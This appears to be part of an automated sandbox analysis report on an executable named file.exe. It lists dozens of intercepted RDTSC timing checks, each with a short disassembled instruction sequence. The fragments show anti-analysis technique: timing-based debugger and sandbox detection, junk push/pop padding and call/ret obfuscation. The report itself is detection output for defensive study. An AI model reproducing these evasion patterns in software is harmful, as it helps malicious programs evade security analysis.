Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10CA7 second address: A10CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10CAD second address: A10CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10CB1 second address: A10CCB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10DBA second address: A10DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB9C8FCDCB9h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB9C8FCDCACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10DE4 second address: A10DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10DE8 second address: A10DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A10DEF second address: A10E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor esi, 7DFE8C7Ah 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB9C8FCBE98h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a cmc 0x0000002b push 1E54A966h 0x00000030 push ecx 0x00000031 jg 00007FB9C8FCBE98h 0x00000037 pop ecx 0x00000038 xor dword ptr [esp], 1E54A9E6h 0x0000003f add ecx, 19E00CCFh 0x00000045 push 00000003h 0x00000047 xor dword ptr [ebp+122D1B5Bh], edx 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+122D2E8Ch], eax 0x00000055 push 00000003h 0x00000057 call 00007FB9C8FCBE99h 0x0000005c push eax 0x0000005d push edx 0x0000005e push ecx 0x0000005f pushad 0x00000060 popad 0x00000061 pop ecx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10F6E second address: A10FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c mov ch, ah 0x0000000e mov dword ptr [ebp+122D3079h], esi 0x00000014 push 00000000h 0x00000016 je 00007FB9C8FCDCB9h 0x0000001c push eax 0x0000001d jmp 00007FB9C8FCDCB1h 0x00000022 pop edi 0x00000023 xor dword ptr [ebp+122D31C2h], ebx 0x00000029 push B4B24740h 0x0000002e jc 00007FB9C8FCDCACh 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push edi 0x00000038 pop edi 0x00000039 popad 0x0000003a add dword ptr [esp], 4B4DB940h 0x00000041 sub dword ptr [ebp+122D33B7h], edx 0x00000047 push 00000003h 0x00000049 mov cl, al 0x0000004b push 00000000h 0x0000004d mov cx, dx 0x00000050 push 00000003h 0x00000052 mov ch, 00h 0x00000054 mov esi, dword ptr [ebp+122D37DDh] 0x0000005a call 00007FB9C8FCDCA9h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 pop eax 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FE3 second address: A10FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FE9 second address: A10FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FEF second address: A10FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10FF3 second address: A11014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB9C8FCDCB6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11014 second address: A11031 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d jns 00007FB9C8FCBE98h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11031 second address: A11036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11036 second address: A1103B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1103B second address: A11055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB9C8FCDCACh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11055 second address: A11063 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9C8FCBE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A11063 second address: A110F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB9C8FCDCB2h 0x0000000e mov edx, dword ptr [ebp+122D3891h] 0x00000014 popad 0x00000015 mov cx, B13Ah 0x00000019 lea ebx, dword ptr [ebp+12452AA8h] 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FB9C8FCDCA8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 movsx esi, cx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e jmp 00007FB9C8FCDCB2h 0x00000043 jmp 00007FB9C8FCDCB1h 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jng 00007FB9C8FCDCB6h 0x00000052 jmp 00007FB9C8FCDCB0h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A110F4 second address: A110FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3014D second address: A30157 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9C8FCDCA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30157 second address: A30171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB9C8FCBEA8h 0x0000000c jmp 00007FB9C8FCBE9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30453 second address: A3046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9C8FCDCB6h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3046F second address: A30483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBEA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3083B second address: A30842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30842 second address: A30863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push edx 0x00000009 jmp 00007FB9C8B8B516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C36 second address: A30C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007FB9C8D34AF2h 0x0000000b jmp 00007FB9C8D34AECh 0x00000010 push edx 0x00000011 jmp 00007FB9C8D34AEAh 0x00000016 pop edx 0x00000017 push edi 0x00000018 js 00007FB9C8D34AE6h 0x0000001e pop edi 0x0000001f popad 0x00000020 jo 00007FB9C8D34B0Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C6C second address: A30C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9C8B8B506h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C76 second address: A30C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30C7A second address: A30C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FB9C8B8B50Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F29 second address: A30F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB9C8D34AF0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2469B second address: A246A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A246A1 second address: A246A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02E9A second address: A02EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A02EA0 second address: A02EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3137F second address: A3138A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3138A second address: A3138E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31A1B second address: A31A34 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB9C8B8B514h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31A34 second address: A31A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FB9C8D34AE6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31B7A second address: A31B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31B82 second address: A31B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31F52 second address: A31F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A31F56 second address: A31F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB9C8D34AF4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D1E second address: A35D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35D22 second address: A35D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9C8D34AF4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3882A second address: A3882F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38D25 second address: A38D2F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9C8D34AECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38D2F second address: A38D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38E9F second address: A38EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CF34 second address: A3CF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3CF38 second address: A3CF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9C8D34AF7h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D0F4 second address: A3D0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D252 second address: A3D285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8D34AF2h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB9C8D34AFAh 0x00000012 jmp 00007FB9C8D34AEEh 0x00000017 jnc 00007FB9C8D34AE6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D6B8 second address: A3D6C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jp 00007FB9C8B8B506h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7D4 second address: A3D7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7DE second address: A3D7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7E4 second address: A3D7E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D7E8 second address: A3D829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9C8B8B514h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB9C8B8B514h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB9C8B8B510h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FDFF second address: A3FE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A404C1 second address: A404C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A406B7 second address: A406BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A40F98 second address: A40FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 js 00007FB9C8B8B518h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417DE second address: A417E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A417E4 second address: A417E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A429A2 second address: A429A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A429A6 second address: A429B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A065BF second address: A065C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45502 second address: A4550D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4526C second address: A45270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4550D second address: A45511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45E8F second address: A45E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45C7B second address: A45C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45E93 second address: A45E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A468E8 second address: A468EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A468EE second address: A468F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A468F3 second address: A468F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47372 second address: A47376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49191 second address: A49195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49195 second address: A4919B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4919B second address: A491A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A0FD second address: A4A18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007FB9C8D34AEDh 0x0000000c nop 0x0000000d mov ebx, esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB9C8D34AE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jl 00007FB9C8D34AFCh 0x00000031 call 00007FB9C8D34AF5h 0x00000036 pop ebx 0x00000037 jmp 00007FB9C8D34AF2h 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007FB9C8D34AE8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov dword ptr [ebp+122D2EFBh], eax 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push ebx 0x00000063 pop ebx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A18B second address: A4A18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A18F second address: A4A19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FB9C8D34AE6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A19D second address: A4A1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B1D6 second address: A4B1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C277 second address: A4C27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C27C second address: A4C299 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FB9C8D34AEFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C299 second address: A4C2F8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB9C8B8B506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c stc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB9C8B8B508h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov bl, FFh 0x0000002b push 00000000h 0x0000002d jno 00007FB9C8B8B515h 0x00000033 xchg eax, esi 0x00000034 js 00007FB9C8B8B50Eh 0x0000003a push eax 0x0000003b jnc 00007FB9C8B8B506h 0x00000041 pop eax 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2F8 second address: A4C2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2FC second address: A4C30D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8B8B50Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C30D second address: A4C312 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
